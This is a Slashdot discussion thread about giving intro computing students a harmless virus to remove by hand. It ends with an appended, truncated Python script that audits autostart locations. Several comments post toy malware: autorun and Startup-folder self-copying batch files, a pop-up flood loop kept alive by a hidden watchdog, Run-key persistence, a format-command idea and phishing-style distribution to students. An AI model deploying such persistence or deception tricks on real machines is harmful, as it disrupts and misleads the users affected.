    As with all dangerous things, the key is to make everyone aware of the dangers and the consequences, and then closely supervise them. A lab course I took actually required us to use plutonium for neutron activation. As far as dangerous things go, that's on the top of the list. But we wore film badges and were supervised, and everything turned out okay.

  40. Try this instead. by neiras · · Score: 5, Interesting

    What do you expect a student to learn from being told "there is a virus on this machine, remove it by hand"?

    If they are in the "demystifying the black box" phase, they have no idea what you're talking about.

    Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose. Give them an overview of how a machine or user might be tricked into running malicious software. Teach them about how malicious software might propagate. Use historical examples. Talk about privileges.

    Virus is a slang term that brings up all kinds of scare reactions in ordinary people. They immediately assume that machines are vulnerable to bacteria floating around on the wind, or something similar. You need to de-emphasize the term "virus". It's just software. Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

    Write a simple program that copies itself to the Windows folder and starts itself at boot. The program should show an alert box saying "HACKED BY PROFESSOR HANDSOME!!!!" if it sees it is being run from the Windows folder. Put it on a USB key with an autorun.ini, tell them you have placed a virus you wrote on there, and let them sort it out. Just be sure you're on an XP machine and that autorun is enabled.

    Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

    1. Re:Try this instead. by trampel · · Score: 1

      Somebody please mod parent up!

    2. Re:Try this instead. by Barny · · Score: 1

      Yeah, about writing a small virus, you do know that a lot of the early viruses were written without thought to their global spread (best example is the Morris worm), and that if your particular one gets out, no matter how innocent, it will be a federal felony to have done that? Worth your job? No.

      Best bet would be for the parent to officially contact an AV company and ask them, they will be able to give professional advice and possibly even live code (but I doubt that, would likely need to go looking for one you want to use) and you will have plausible deniability because you sought "professional advice" from a "known industry leader".

      --
      ...
      /me sighs
    3. Re:Try this instead. by rochberg · · Score: 1

      Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

      Market share, yes. Vulnerabilities in Windows code...eh, not so much any more. It may not be the most popular thing to say around these parts, but MS has made great strides in adopting and pushing secure coding techniques. These days, the most culpable are third-party developers, especially device drivers. Sure, you can argue that Windows' access control policies allow it, but that's not what you said above. But I'm just being nitpicky.

      Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

      Are you insane?!? Absolutely DO NOT DO THIS!!

      I remember a few years ago when researchers at Indiana University conducted a study on phishing. Basically, they set up a web site and lured students to enter their credentials. The s*** storm that erupted was immediate and furious. The only thing that saved these researchers' jobs was that they had worked very closely with the school's Institutional Review Board (IRB) to make sure that they were adequately ensuring (among other things) respect for persons. Deception is inherently disrespectful, even if it is done with good intentions.

      What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

    4. Re:Try this instead. by neiras · · Score: 2, Informative

      Better yet, email the .exe to the entire class.

      Are you insane?!? Absolutely DO NOT DO THIS!!

      The gap between my suggestion and what those researchers did is pretty wide. My idea:

        o Doesn't involve bilking people out of their private credentials;
        o Would be limited to a class studying malicious software (how's that for an appropriate context)
        o Involves a known-harmless teaching payload;
        o Would be fully understood and removed by students at the end of the class.

      Deception is inherently disrespectful, even if it is done with good intentions.

      What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

      I have a hard time understanding why any real teacher in this fellow's position would abstain from imparting one of the most critical lessons a student can learn about security: that they themselves are the weakest link, no matter how smart and prepared they think they are, and no matter how much theory they can regurgitate at paper time.

      The burned hand teaches best, and understanding how and why you were burned is priceless.

      It's disrespectful, and even a little condescending, to 'protect' students from real lessons. Are we preparing them for the real world or not? And are students so fragile that they would run to the Dean's office to complain about the teacher after such a simple and well-explained exercise?

    5. Re:Try this instead. by Sparx139 · · Score: 1

      It's an isolated network. But, assuming that you knew that and mean if it wasn't properly cleaned, or managed to escape by some other method, it just requires some planning beforehand. Write conditions in so that it will only activate at a certain date (so after a few days it's benign). Or conversely, if the system clock doesn't match the date, then it deletes itself.
      It just means that safeguards need to be placed.

      --
      Our culture doesn't get smarter, it just finds new ways of being retarded.
    6. Re:Try this instead. by kklein · · Score: 1

      I haven't seen mod points in a very long time (part of why I stopped reading Slashdot almost entirely, if anyone cares), but as a teacher (linguistics, actually), this is how you handle something. It is cute, it is instructive, and it is likely to stay in their memories for a long time.

      If you're not teaching, you should be (although it's hard to find well-paying work--but if you do, you hang on like grim death).

    7. Re:Try this instead. by Anonymous Coward · · Score: 0

      Or with Windows' habit of hiding the extension, call it CS101-Example.doc.exe

    8. Re:Try this instead. by pla · · Score: 1

      What may seem like a "harmless infection" to you demeans the students

      Oh, gimme a frickin' break. The sooner the precious little froshie lardflakes learn not to click every attachment from a seemingly trusted source, the better.

      "Demean"? Yeah, doing something stupid makes you feel stupid. Doing it twice proves it. Hopefully most of them won't do it when he pulls the same trick as part of the final.


      Of course, in practice, you speak 100% the truth. God forbid we make someone feel bad as a learning experience, the lawyers would descend like... Well, like lawyers.

    9. Re:Try this instead. by neiras · · Score: 1

      If you're not teaching, you should be (although it's hard to find well-paying work--but if you do, you hang on like grim death).

      You just made my day. Thanks for the encouragement.

    10. Re:Try this instead. by mcgrew · · Score: 1

      Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose.

      It doesn't have to have a malicious purpose to be a virus, and it doesn't have to be a virus to be malware.

      Give them an overview of how a machine or user might be tricked into running malicious software.

      That's a trojan, not a virus.

      Virus is a slang term that brings up all kinds of scare reactions in ordinary people.

      No, it's not slang at all. It was called a "virus" because like a biological virus, it's tiny and self-replicating. If it can't replicate, it's not a virus. And if there's anybody in class that believes "vulnerable to bacteria floating around on the wind" they're in the wrong class (and BTW, bacteria and biological viruses are completely different animals).

      Then teach them that 99% of all malicious software runs on Windows

      100% of all VIRUSES run on windows, although your 99% is likely correct about malware in general.

      Call it CS101-Example.exe, and use the harmless infection to talk about social engineering.

      Again, if it needs social engineering it is NOT necessarily a virus. If it needs social engineering it's a trojan. If it can propagate across a network without human intervention it's a worm. Some malware can have elements of viruses, trojans, and worms, but the terms have specific meanings. If he's teaching about malware he should be teaching the differences between the different kinds of malware. There are quite a few excellent books on the subject.

    11. Re:Try this instead. by rochberg · · Score: 1

      Better yet, email the .exe to the entire class.

      Are you insane?!? Absolutely DO NOT DO THIS!!

      The gap between my suggestion and what those researchers did is pretty wide. My idea:

        o Doesn't involve bilking people out of their private credentials;
        o Would be limited to a class studying malicious software (how's that for an appropriate context)
        o Involves a known-harmless teaching payload;
        o Would be fully understood and removed by students at the end of the class.

      Actually, it's not as wide as you think. The researchers did not collect any of the personal data. They simply provided a message that this could have been a scam. So the "payload" there was also harmless. The outrage wasn't about any stolen data. The outrage was completely about the deception. Even after the administration placated fears that the students had about identity theft, the uproar continued. Also, the class isn't focused on malicious software. That's just the topic of this lesson. The class is a 101 introduction to computing. If this were a more advanced class...maybe...given the circumstances. But this is absolutely not the right audience for this kind of lesson.

      As for the harmless payload, how does the student know that? All the student sees is that they clicked on something and the teacher infected their computer. Sure, during the lesson, you point out how to delete the file. But how does the student know that was the only file you installed? You could have embedded a keylogging rootkit within that virus for all they know. By falling for your trick, they lose a little bit of trust in you. As a result, some of them (especially those who are not doing well and think it's because you "have it out for them") will remain suspicious and think that you've planted something nefarious on their computer. Without that trust, you can't convince them otherwise.

      As for the lesson being "fully understood [...] at the end of the class," that's just wishful thinking. After all these years, everyone now knows not to click on email attachments, right? Apparently not. I remember reading some commentary once (I think it was Adam Shostack) that pointed out that user education doesn't work. Many, many people who have undergone security training get phished, install viruses, etc. Why is phishing still a problem? Because it works. Social engineering is effective. All you have to do is surround that link with some text about getting rich fast, seeing celebrity X naked, losing 50 pounds in a week, etc., and you will get some hits. Even from people who have been trained to know better.

      Most likely, some of these students will (in the short term) not click on anything they get via email, even if it's legitimate. After a while, though, the lesson will fade, they'll become complacent, start clicking on things...and we're back at square one. Many of the students will still click on attachments, thinking they're safe. After all, this attachment isn't called "CS101-Example.exe" so it must be safe, right? "What do you mean I got a virus? All I did was open this .doc file. It wasn't a .exe!"

      Deception is inherently disrespectful, even if it is done with good intentions.

      What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

      I have a hard time understanding why any real teacher in this fellow's position would abstain from imparting one of the most critical lessons a student can learn about security: that they themselves are the weakest link, no matter how smart and prepared they think they are, and no matter how much theory they c

    12. Re:Try this instead. by rochberg · · Score: 1

      Oh, gimme a frickin' break. The sooner the precious little froshie lardflakes learn not to click every attachment from a seemingly trusted source, the better.

      See my response above. Assuming that they will actually learn the lesson here requires a big leap of faith (and naivete and a lack of experience studying how well "user education" solves security problems).

      God forbid we make someone feel bad as a learning experience, the lawyers would descend like... Well, like lawyers.

      Again, making students feel bad is not an effective teaching technique. It may work on some, but it will completely backfire on others and you've completely lost them for good. And you don't really have to worry about the lawyers as much as the parents. Yes, the parents. Even in college.

    13. Re:Try this instead. by Anonymous Coward · · Score: 0

      As a student... I wouldn't like that kind of trick pulled on me. But I think it would probably be a decent lesson. It's not at all damaging to anything but one's ego.

  41. Write your own? by rwa2 · · Score: 5, Informative

    It's Windows, so it's easy... just create a CD or USB drive with two files:

    autorun.inf :
    [autorun]
    open=installpopup.bat

    installpopup.bat :
    cmd.exe /k echo "Hi I am a virus"
    copy installpopup.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

    Bonus is that it has plenty of legitimate uses for system automation for your little script kiddies as well.

    1. Re:Write your own? by poor_boi · · Score: 1

      Instead of

      "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

      Use

      "%ALLUSERSPROFILE%\Start Menu\Programs\Startup"

      or to avoid Vista/W7 UAC issues:

      "%USERPROFILE%\Start Menu\Programs\Startup"

    2. Re:Write your own? by Anonymous Coward · · Score: 0

      This.

      Installing an actual real virus on your network, closed or not, does not seem like a good idea to me.

    3. Re:Write your own? by AlexiaDeath · · Score: 1

      IMHO a really good example on how viruses spread. It's simple and clearly takes the magic away. It has all the right elements.

    4. Re:Write your own? by Nesman64 · · Score: 1

      I think rwa2's example is perfect, but if you want to expand the lesson, put a second copy (with slightly different message) in a file called DancingBunnies!.bat

      This will help to explain another common method for viruses to spread.

      --
      coffee | nose > keyboard
  42. Re:DON'T DO IT! You'll get fired by vxice · · Score: 1

    actually in the article he makes it clear he wants to infect a computer to show students how to remove it. Still is risking it, especially since it is normally a simple procedure to remove a virus with an anti virus program.

    --
    every anarchist is a baffled dictator. Benito_Mussolini
  43. Are you looking for an open source virus by zlel · · Score: 1

    or must it be GPL?

  44. Batch hell by William+(Dthdealer) · · Score: 1

    My favourite batch file. It is a shame Windoze does not support a proper POSIX language, but only this crappy DOS batch stuff. AFAIK this script does not work on vista, but works on Windows 7 and XP.

    :START
    msg %username% Memory exception at 0x%RANDOM%
    goto START

    It loops, layering more and more pop-ups the longer it runs. As soon as one is closed or 60 seconds elapses another appears in the centre of the screen, de-focusing whatever the user was typing in or doing. Put it in allusers/startmenu/startup.

    Now write a second batch file and hide it somewhere along with another copy of the above. It should check IF FILE EXIST for the above script, and if it does not exist then copy the above script back to the 'startup' directory. Make this IF FILE EXIST batch file execute on start-up via registry.

    The benefits are that nothing harmful is done and other processes are piggybacked for the operation (I believe explorer.exe perhaps stores the popup queue?), so you won't spot anything out of the ordinary in Task Manager.

    Fixing can be done by simply deleting the files (if the kids can find where they are located).

    AFAIK The pop-ups survive even into the login prompt if the user logs out.

    --
    Linux has bugs. Windows has holes. I am +10/11GMT.
  45. We did the same thing in health class by Anonymous Coward · · Score: 1, Funny

    We did the same thing in health class. The first part of the tutorial was really fun, the latter part not so much.

  46. Wrong class Should be a Graduate Studies Class by Anonymous Coward · · Score: 0

    This is the wrong class to show this type of Malware.

    If this is a 101 class in Computers and in particular Computer Security, you would be better to teach Hardening of Systems.
    Discuss what Malware is and the different types of Malware.

    Reason is the students need to have an understanding of Operating Systems and Applications to do anything in this area.

    If you are still interested then search on "Virus and University of Calgary" on what are the issues.

    Better to focus on back doors and Netcat being the tool. Much better than a virus due to their nature to leave the computer lab.

  47. Just write a program. by sumdumass · · Score: 1

    You are most likely going to be better off to just write a program or script that makes a few files called "lookatme" along with a few registry entries and have them remove that.

    Most viruses that you will find will tip the AV software. Almost all easy viruses will be automatically removed by it too. If you are not running some AV software, then you're in a little trouble to begin with, as you shouldn't be teaching people to run Windows boxen without AV software. Sure, you could probably set the AV software to ignore the file itself, but it likely wouldn't ignore the execution if it wasn't a straight-up program that just wrote files (memory injection and process hiding techniques will most likely cause issues, as most AV clients nowadays rely more on heuristics than actual signatures).

    If I was you, I would write a script that makes a text file in the Windows directory, the system directory, temp directory and maybe adds a few registry entries in the run portions of the registry. Perhaps one of the text files could read something like "you have been pawned by the elite text virus" or something and have it open on start up. Perhaps put it on every other computer and have them search for how to remove it on the one next to them while working in pairs. Make a simple instruction on how to remove it by looking in the appropriate start up areas, looking in the common file target areas, and then finally by downloading a reverse script and running it that removes all traces of it.

    Oh yeah, surf for porn/something as shady on each computer before you load the fake virus so part of the removal/disinfection process can be getting freely available tools like Ad-Aware or Malwarebytes and so on and it will find something to remove. If they aren't connected to the internet, then make sure the free tools are something that doesn't need an internet connection to download. You might also want to remove the AV software and have them simulate installing it afterward to ensure/instill that there should be some level of protection at all times.

  48. Re:How about... by X0563511 · · Score: 3, Informative

    Er, did you even read the damn post?

    Here, let me help you out with the first four fucking words:

    Currently I am teaching...

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  49. Re:Simple by Speeddymon · · Score: 1

    Someone that is asking a question such as the OP isn't going to know what a distro is dude, you have to break it down for them. Regardless, your post wasn't even remotely funny. It was redundant and boring, the kind of thing that a 13 year old posts these days.

  50. Re:DON'T DO IT! You'll get fired by X0563511 · · Score: 1

    He's not asking how to teach them to write a virus...

    Please (re?)read the post...

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  51. Why not a live virus? by AgentPhunk · · Score: 1

    Perhaps a better learning experience would be to connect the lab (or a handful of the students' own computers) to the Internet, and stick a box running Snort (www.snort.org) with Emerging Threats (www.emergingthreats.net) signatures in between. If, by some miracle (or the fact that they're all Macs) you don't have any immediate indicators of infection, then head on over to teh Googles and search for 'smiley tool bar' or 'free porn' with the I'm-Feeling-Lucky button. That ought to do the trick.

    Get a full packet capture of the session so you can dissect how the virus was able to get on the machine, where it left hooks, how it's similar and different to other types of malware, etc.

    I agree that a review of a simple virus is a worthwhile endeavor, but perhaps that's best learned via a good book or whitepapers on the Internet. Save the demo for something that's relevant and 'live'.

    And on second thought, maybe it's best if you set up a demo machine to be infected. That way you can nuke it from space afterwards, just to be sure.

  52. Virus Creation Laboratory? by technos · · Score: 1

    A friend of mine who taught at a community college actually did this back in the mid 90s. He took a copy of Nowhere Man's Virus Creation Lab and tossed together a couple of annoying but non-destructive viruses and infected a few standalone machines for the students to play with.

    You can probably still find VCL out there, or a more modern DIY virus kit. Though with the new ones, I'm not sure I would trust they don't have any hidden functionality.

    --
    .sig: Now legally binding!
  53. Simple way to get infected by kelarius · · Score: 0

    Just tell the students to go onto Facebook or MySpace and play every stupid little game or take every stupid little quiz in sight. Then, tell them to click on every stupid little "get a xxxxxxxx degree in weeks" advert they see, and download whatever is recommended on those sites. Find a suitably infected machine, create an image off that machine, and you're set.

    I'm actually not joking, this is what I do when I want to play with whatever viruses are currently in the wild.

    --
    Personally I'd rather have my idiots at home glued to the TV than out doing idiotic things
  54. Re:How about... by santax · · Score: 1

    Dude, this is Slashdot. I skip the first 4 sentences and read the last line to sum it up for me. Besides, I wonder what he is doing teaching this if he has to ask this. Just install a damn virtual machine and play in there. Don't infect the lab that other teachers' students need to use with a virus that you have to ask someone for.

  55. An answer for your OP: by RMingin · · Score: 1

    You don't want an actual virus. Viruses are becoming less common, they are now the delivery vector more than anything. Most of my badware experience in the last year or three has been exploits, generally server-hosted and browser-targeting. Malware is the payload and payday, that's where the action is. Malware is also typically the user-facing component as well.

    Go find Antivirus 2009, or the most recent respin of that godawful thing. It's fairly straightforward to remove, fairly obvious when it's present, and just aggressive enough against removal operations to be realistic. It won't self-replicate and spread, but it will give you a removable and obvious "infection".

    --
    The preceding comment is my own, and in no way construes an opinion of the Emperor of Mankind.
    1. Re:An answer for your OP: by Pranadevil2k · · Score: 1

      One of my relative's PCs got some really nasty malware recently that pretended to be antivirus software and would halt any action taken by the user with a popup saying the thing you were doing (Taskmanager.exe and the like) was infected. It implied you had to pay $30 to buy the 'full version' of the software to fix it, and the only way to pay was with a credit card. I have never seen a more aggressive piece of software and I had no idea how to fix it other than a boot from CD reformat. Scary stuff :\

    2. Re:An answer for your OP: by RMingin · · Score: 1

      That certainly sounds familiar. It's most likely the newest variant. There have been easily a dozen major updates of Antivirus XP, they've been nasty to remove.

      It *is* possible to remove it, though, and even without reinstall. The real trick is getting a wedge under it to start with, because it's very tenacious until then.

      --
      The preceding comment is my own, and in no way construes an opinion of the Emperor of Mankind.
    3. Re:An answer for your OP: by cbiltcliffe · · Score: 1

      and I had no idea how to fix it other than a boot from CD reformat.

      Read the registry from another computer, and check all the spots where programs autostart.
      Then check all the filesystem locations where programs start.

      Delete anything that looks nasty.

      Problem solved.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
  56. Windows is a virus by isabellf · · Score: 0, Offtopic

    As many slashdotters know Windows is a virus : http://www.annoyances.org/exec/show/article09-115.

    Teach them to boot up a Linux CD and reformat the whole thing, this is virus eradication!

  57. Spend 10 minutes downloading porn! by colman77 · · Score: 1

    you'll be all set! No, of course you won't get fired.

  58. Easy web browser one by zmaragdus · · Score: 1

    It might be caught by modern browsers, but if you turn off all the security features (or just load up IE5 or something like that), you might be able to pull the one where you open an html document (with embedded javascript for the "virus" portion) and it, in turn, opens up two copies of itself. Those two each open two copies, and so on and so forth, until you've brought your machine to a screeching halt with the glut of windows opening up.

    Easy to fix, too. Just manually shut down the machine (either hard power off or yank the cord), then delete the offending file.

    --
    (((dB)))
  59. Defining Malware first? by garompeta · · Score: 1
    I think that we should remember the original concept of a virus: self-replicating code. A binary that keeps copying itself and infecting other programs by binding its own code to them.
    A very simple conceptual and inoffensive "virus" could be a simple bat that copies itself with a >> to any bat file... something really annoying I made once was a file called: "glutton.bat" which had,
    @echo off
    echo Can't stop eating...
    echo I just can't...
    echo glutton.bat>>target.bat

    As soon as glutton is run, target gets "infected" with a new line... and when "target.bat" is run, it will just keep increasing its size ad infinitum.
    This is not executable and still explains the fundamental concept of how a virus behaves.
    Now, if you want to infect a network with a proper worm, that is another story and I think that explaining about exploits and autorooters is way out of the scope of a 101 class IMO.

  60. Manual removal by Anonymous Coward · · Score: 0

    Since you're looking for something the students can manually remove, why not just create a "virus" file that is really just a small file full of random data. Tell them the file is located in /path/to/system/files/ is N bytes in size and has a random file name. Then they can find and delete it. Then there is no risk, no explaining what you were thinking to your boss and the students get the basic concept of seek and destroy.

    1. Re:Manual removal by monkyyy · · Score: 1

      No, deleting sys files by hand is always a bad idea

      --
      warning pointless sig
    2. Re:Manual removal by cbiltcliffe · · Score: 1

      Then what do you recommend for viruses that aren't yet detected by most antivirus software?
      Just wait for definitions to come out?

      No. You find and delete a system file by hand.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    3. Re:Manual removal by monkyyy · · Score: 1

      I'd recommend Linux ^__^

      or sandboxing web browsers (or disabling IE),
      super antivirus,
      having the tools to fix the problem on hand,
      and this one very hard to find setting that windows where it asks u if u want to allow each and every program access to u hd if it tries

      --
      warning pointless sig
    4. Re:Manual removal by cbiltcliffe · · Score: 1

      I'd recommend Linux ^__^

      Not the point. We're talking about infected Windows systems, here. Once it's already infected, it's too late to prevent infection by switching to Linux.

      or sandboxing web browsers (or disabling IE),

      Web browsers aren't the only way machines get infected. You'd have to sandbox everything, which, while possible, certainly isn't practical in a lot of cases.

      super antivirus,

      Pipe dream. Now how about something that actually exists?

      having the tools to fix the problem on hand,

      which hasn't got a lick to do with whether you have to delete a system file manually or not. In fact, I'd say that the tools (Knoppix, WinUBCD, et al) to fix the problem are the right tools specifically _because_ they allow you to delete a system file by hand.

      and this one very hard to find setting that windows where it asks u if u want to allow each and every program access to u hd if it tries

      So, another recommendation of something that doesn't exist. Great.
      Maybe your next computer will be secured by unicorns.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
  61. simple and effective.... by metalmaster · · Score: 1

    Create a batch file with a shady sort of name

    You can use a simple command like >> start iexplore -k "error.htm"

    Use http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html to convert the file to an executable. Have your students run the file so that it opens the error page in IE kiosk mode. (Annoying enough to not have a "Close" button.) Demonstrate how open windows can be tracked to their parent process (error.htm is opened by sh4dY.exe) from within Task Manager. Hunt down and terminate the offending process, delete the exe and maybe the offending web page.

  62. Really Simple by b4upoo · · Score: 1

    If you wanted to teach students about viruses and had a Win 98 system or any system that has DOS you could do really simple demos. A nice sounding batch file with a format command would be a start. Once the students understand that even primitive programmers can create malware easily then you might show them some of the scripts that people plug into their own programs to cause devastation. Next might be to explain that advanced programmers and even governments can write really sinister viruses but that may involve years of learning. It might also involve years in prison.

  63. So when students make a copy and it goes wild by joeflies · · Score: 1

    Who are they going to blame?

    I can picture that bright, inquisitive kids (and maybe a few of the bad apples too) get a hold of a virus and create a copy of it / upload it to a server / save it to a USB drive, and then it gets out and infects other school computers, then guess whose door they're going to knock on?

    Yes, there's plenty of ways that kids can get virus code on their own. But there's a big difference between when a kid picks up a loaded gun from home, vs getting one from the teacher, and hoping that it doesn't go off in an unintended manner.

  64. I once had such a class. by cheekyjohnson · · Score: 1

    It was filled with people who barely knew how to work a television remote, let alone use a computer. I think you might be wasting your time...

    --
    Filthy, filthy copyrapists!
  65. You're a lousy teacher. by tomhudson · · Score: 1
    "Demystifying computers" - teaching them how to remove a virus isn't going to do that.

    Teach them how a computer actually works - if they don't know what's normal, how the heck are they supposed to recognize when something is wrong?

    Besides, if they're too stupid to recognize what's normal by now (like they've never really used a computer before), you're wasting your time "demystifying computers." If they're too old, or too young, you're again wasting your time. Perhaps we should send you to Soviet Russia and have a virus remove YOU!

    1. Re:You're a lousy teacher. by guyminuslife · · Score: 1

      Why?

      Nobody's too old to want to learn new tricks. Nobody's too young for an introduction to computers (provided they have the motor skills to use one). Plenty of people get discouraged from learning things about their computers---like how to fix them---precisely because of that attitude. So they call up their nephews and brothers-in-law and don't ever bother with it: many are perfectly capable and intelligent people, but they never learn because they assume they'll screw it up. Which they will, if they never learn...

      Your attitude is counterproductive and asinine. There are a lot of people I would like to send to a class like this.

      --
      I don't believe in time. It's a grand conspiracy designed to sell watches.
    2. Re:You're a lousy teacher. by Anonymous Coward · · Score: 0

      You're a lousy asshole. You have no idea what he's teaching, where in the unit he is, or what understanding the students have. Who are you to claim he's a lousy teacher?

    3. Re:You're a lousy teacher. by tomhudson · · Score: 1

      "Demystifying computers" + "let me install a virus so that they can practice" == retarded.

  66. The Giant Black Book of Computer Viruses by equex · · Score: 1

    Get 'The Giant Black Book of Computer Viruses' - old but I remember it had simple ASM viruses you could play with.

    --
    Can I light a sig ?
  67. Re:DON'T DO IT! You'll get fired by Stormscape · · Score: 0

    RTFA, he's teaching them how viruses work and how to remove them, not how to write one.

  68. I Like it! by jeeribaldi · · Score: 1

    This is a great idea for an intro-level course. Not only does it teach about viruses, but about social engineering viruses - the ones that do no harm unless you "buy in" and follow the malicious instructions. Leave a cheap USB stick on their desks, or on the floor. It just needs to contain the self-written virus and autorun.ini; those who plug it in fail, those that don't, pass - at least the first stage of the test. Then let them develop their own break-out groups to remove it from those students' machines that fail the first part. Great lesson! Very inventive and engaging! Make the virus like the one (I cannot remember the exact name) that infects machines by displaying a Microsoft Security Essentials message saying IE is infected, then tries to get you to download anti-malware software that actually is malware. My two cents (of course my 2 cents are valued at rates from the 1970's, so through devaluation and inflation... whatever)

  69. That virus will fail on Vista/7 by Anonymous Coward · · Score: 4, Informative

    if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

    For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

    Use

    copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

    1. Re:That virus will fail on Vista/7 by rwa2 · · Score: 1

      if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

      For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

      Use

      copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

      Thanks! I'm by no means a Windows guru, nor have anything other than my corporate WinXP box to test on :P

    2. Re:That virus will fail on Vista/7 by CorporateDrew · · Score: 1

      RWA2, I really like this example. It's instructional and non-destructive. This kind of example could be used in a simple scripting lesson earlier in the course regarding how simple software installation scripting works. I think you could defend this example against the "what were you thinking when you taught them this?" rhetoric (see above "DON'T DO IT. You'll get fired" thread).

    3. Re:That virus will fail on Vista/7 by GF678 · · Score: 1

      That script will also fail if, like we do, Autorun is (sensibly) disabled using Group Policy. If it isn't then I'd go talking to your IT department as to why not. :)

    4. Re:That virus will fail on Vista/7 by Anonymous Coward · · Score: 0

      French versions of Windows use "Program Files" and "Documents and Settings".

    5. Re:That virus will fail on Vista/7 by rwa2 · · Score: 1

      If the only thing we do is teach these kids to become the kinds of people who disable autorun (or hold down Shift while inserting untrusted media), then we would have already made the world a slightly better place...

    6. Re:That virus will fail on Vista/7 by Anonymous Coward · · Score: 0

      Nothing like getting good virus writing lessons from \.ers.

    7. Re:That virus will fail on Vista/7 by Anonymous Coward · · Score: 0

      The UAC issue aside, a brief comment on the localization thing: this might fail in Vista, but it might not fail in 7. The fun thing in 7 is, these directories are only localized on the UI level and no longer in the file system. "c:\Document and Settings" does indeed work on my German Windows 7 instance, so does "C:\Users", etc. etc.

  70. My CSI teacher did something similar... by Anonymous Coward · · Score: 1, Funny

    Demonstrated how someone is murdered. I was glad I didn't draw the short straw to be the victim.

    They're now serving life.

  71. Use semi-current infection location to be worth it by likuidkewl · · Score: 1

    So with this type of example in today's computing world, I would suggest a simple program that is autorun at start, say in the registry under windows/current version/run or the like. It could write a copy of itself to the temp folder and check every 5 seconds to see if the key or file has been modified/removed. This can all be done easily with, say, a VBS/batch/PowerShell script.

    example location:
    HKLM\software\microsoft\windows\current version\run\

    Just keep say the main copy in %TEMP% and try to keep persistence in the %windir%.....The possibilities are endless

    and using $ for variables was awful i will $variable any day!

    If I effed up the Windows registry locales, sorry. I don't use windows much anymore.
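
The removal steps described in this thread (cbiltcliffe's "read the registry from another computer, and check all the spots where programs autostart", and the Run-key and Startup-folder locations named in the comment above) can be scripted for the cleanup half of the exercise. The following Python is an added example, not code from any poster; it assumes a regedit-format `.reg` export and a mounted Windows volume, uses the real key name `CurrentVersion\Run`, and its sample export, value names and paths are constructed.

```python
"""Offline autostart audit for a lab cleanup exercise (added example)."""
import re
from pathlib import Path

# Run/RunOnce under any hive (or Wow6432Node); compared case-insensitively.
AUTOSTART_SUFFIXES = (
    "\\microsoft\\windows\\currentversion\\run",
    "\\microsoft\\windows\\currentversion\\runonce",
)
# A script extension anywhere in the command, e.g. cmd.exe /c "x.bat".
SCRIPT_RE = re.compile(r'\.(bat|cmd|vbs|js|ps1)(?=["\s,]|$)', re.I)
# Places an unprivileged user can write to. A hit means "review this entry",
# not "malicious": legitimate per-user software also starts from AppData.
WRITABLE_HINTS = ("%temp%", "%tmp%", "\\temp\\", "%appdata%", "\\appdata\\",
                  "%userprofile%", "%allusersprofile%")
# Startup folders relative to the root of a mounted Windows volume.
STARTUP_GLOBS = (
    "Documents and Settings/*/Start Menu/Programs/Startup/*",  # XP
    "Users/*/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/*",
    "ProgramData/Microsoft/Windows/Start Menu/Programs/Start[Uu]p/*",
)

# Constructed sample in regedit's export format; not taken from a real machine.
SAMPLE_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorTray"="C:\\Program Files\\Vendor\\tray.exe"
"lookatme"="cmd.exe /c \"C:\\Documents and Settings\\student\\Local Settings\\Temp\\lookatme.bat\""
"Updater"=hex(2):25,00,54,00,45,00,4d,00,50,00,25,00,5c,00,75,00,70,00,64,00,\
  2e,00,65,00,78,00,65,00,00,00
"Flags"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"Ignored"="C:\\Temp\\not-an-autostart.bat"
"""


def _unescape(s):
    # .reg strings escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def _decode(raw):
    """Return the string held by a .reg value, or None for non-string types."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return _unescape(raw[1:-1])
    m = re.match(r"hex\([12]\):(.*)$", raw, re.I)  # REG_SZ / REG_EXPAND_SZ as hex
    if m:
        data = bytes.fromhex(m.group(1).replace(",", ""))
        return data.decode("utf-16-le", errors="replace").rstrip("\x00")
    return None  # dword, binary, ...


def parse_reg(text):
    """Yield (key, value_name, data) for each string value in a .reg export."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join wrapped hex lines
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # "[-KEY]" is a deletion directive in a .reg file, not data.
            key = None if line.startswith("[-") else line[1:-1]
            continue
        m = re.match(r'(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if key and m:
            name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
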